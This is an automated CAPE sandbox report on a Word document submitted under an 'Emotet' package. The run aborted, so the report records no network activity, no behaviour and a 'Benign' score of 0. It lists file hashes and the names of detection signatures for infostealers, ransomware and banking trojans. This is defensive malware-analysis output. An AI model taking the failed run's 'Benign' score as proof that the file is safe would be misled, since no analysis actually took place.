Analysis

Category Package Started Completed Duration
FILE Emotet 2020-03-24 10:05:10 2020-03-24 10:05:32 22 seconds
  • Info: Analysis failed: The package "modules.packages.Emotet" start function raised an error: Unable to execute the initial process, analysis aborted.
2020-03-24 10:05:11,000 [root] INFO: Date set to: 03-24-20, time set to: 10:05:11, timeout set to: 200
2020-03-24 10:05:11,046 [root] DEBUG: Starting analyzer from: C:\ovptadn
2020-03-24 10:05:11,046 [root] DEBUG: Storing results at: C:\gTeeeM
2020-03-24 10:05:11,046 [root] DEBUG: Pipe server name: \\.\PIPE\gbwwdUTPvA
2020-03-24 10:05:11,046 [root] INFO: Analysis package "Emotet" has been specified.
2020-03-24 10:05:11,904 [root] DEBUG: Started auxiliary module Browser
2020-03-24 10:05:11,904 [root] DEBUG: Started auxiliary module Curtain
2020-03-24 10:05:11,904 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-03-24 10:05:12,559 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2020-03-24 10:05:12,559 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module DigiSig
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module Disguise
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module Human
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module Screenshots
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module Sysmon
2020-03-24 10:05:12,559 [root] DEBUG: Started auxiliary module Usage
2020-03-24 10:05:12,559 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Emotet
2020-03-24 10:05:12,559 [root] INFO: Analyzer: Package modules.packages.Emotet does not specify a DLL_64 option
2020-03-24 10:05:12,605 [lib.api.process] ERROR: Failed to execute process from path "C:\Users\user\AppData\Local\Temp\hLbB899bly.exe" with arguments "None" (Error: This version of %1 is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher (ERROR_EXE_MACHINE_TYPE_MISMATCH))
2020-03-24 10:05:12,605 [root] ERROR: Traceback (most recent call last):
  File "C:\ovptadn\analyzer.py", line 1332, in <module>
    success = analyzer.run()
  File "C:\ovptadn\analyzer.py", line 1151, in run
    "error: {1}".format(package_name, e))
CuckooError: The package "modules.packages.Emotet" start function raised an error: Unable to execute the initial process, analysis aborted.

MalScore

0.0

Benign

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2020-03-24 10:05:10 2020-03-24 10:05:31

File Details

File Name d576b437c87c8b69b39dc86e23caded42affb2ef
File Size 241755 bytes
File Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Voluptatem., Author: Elisa Girard, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Feb 7 13:40:00 2020, Last Saved Time/Date: Fri Feb 7 13:40:00 2020, Number of Pages: 1, Number of Words: 4, Number of Characters: 24, Security: 0
MD5 7184cec4c868d442405cd8d484670ea7
SHA1 4e70cce99a1d69e5a151a65eadb557daad6d9595
SHA256 895a867ebd42a2af802ca3c40609f639e485804548206877754f83ac55468aa6
SHA512 c33d816fc348ead47e3c36d3dcf8a05b5681b4f9681936e80bb12cfd0aac8d49cd0155188682e2c2cb74abbf46655009bfe8c864a7b81c97f5baeeae656aab5e
CRC32 5CC8483A
Ssdeep 6144:Ww0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+BOKEw/zRW:l0E3dxtR/iU9mvUPBCw/zRW
TrID
  • 54.2% (.DOC) Microsoft Word document (32000/1/3)
  • 32.2% (.DOC) Microsoft Word document (old ver.) (19000/1/2)
  • 13.5% (.) Generic OLE2 / Multistream Compound File (8000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

No signatures


Screenshots

No screenshots available.

Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

No static analysis available.
This file is not on VirusTotal.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Processing ( 0.434 seconds )

  • 0.112 CAPE
  • 0.11 TargetInfo
  • 0.106 TrID
  • 0.082 NetworkAnalysis
  • 0.017 Strings
  • 0.006 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.044 seconds )

  • 0.008 ransomware_files
  • 0.007 antiav_detectreg
  • 0.003 persistence_autorun
  • 0.003 antiav_detectfile
  • 0.003 infostealer_ftp
  • 0.003 ransomware_extensions
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.001 tinba_behavior
  • 0.001 rat_nanocore
  • 0.001 cerber_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antianalysis_detectreg
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 disables_browser_warn
  • 0.001 infostealer_mail
  • 0.001 masquerade_process_name

Reporting ( 0.0 seconds )

Task ID 131473
Mongo ID 5e79db700986a12c9f6d5f5f
Cuckoo release 1.3-CAPE